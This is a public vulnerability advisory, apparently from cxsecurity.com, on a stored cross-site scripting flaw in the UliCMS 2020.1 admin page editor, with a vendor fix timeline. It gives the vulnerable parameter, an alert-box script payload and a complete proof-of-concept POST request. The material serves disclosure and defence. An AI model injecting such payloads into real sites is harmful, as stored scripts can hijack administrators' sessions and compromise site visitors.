UliCMS 2020.1 Cross Site Scripting

2020.03.29
Credit: SunCSR
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: UliCMS 2020.1 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2019-03-24 # Exploit Author: SunCSR # Vendor Homepage: https://en.ulicms.de # Software Link: https://en.ulicms.de/current_versions.html # Version: 2020.1 # Tested on: Windows # CVE : N/A ### Vulnerability : Stored Cross-Site Scripting # Description A stored cross-site-scripting security issue in the save page feature Url : http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20 Request Type: POST Vulnerable Parameter : "content" Payload : content=<script>alert('XSS')</script> #POC POST /ulicms/admin/index.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0 Accept: */* Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 866 Origin: http://TARGET Connection: close Cookie: 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7 csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=20 &slug=lorem_ipsum&title=Lorem+Ipsum&alternate_title=&show_headline=1&type=page&language=de&menu=top&position=15 &parent_id=NULL&active=1&target=_self&hidden=0&category_id=1&menu_image=&link_url=&link_to_language= &meta_description=&meta_keywords=&robots=&article_author_name=&article_author_email=&article_date=&excerpt=&og_title= &og_description=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=&list_order_by=title &list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url= &text_position=before&article_image=&author_id=1&group_id=1&comments_enabled=null&cache_control=auto&theme= &access%5B%5D=all&custom_data=%7B%7D&content=<script>alert('XSS')</script>&csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb ### History ============= 2019-03-18 Issue discovered 2019-04-18 Vendor contacted 2019-04-18 Vendor response and hotfix 2019-04-24 Vendor releases fixed versions


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top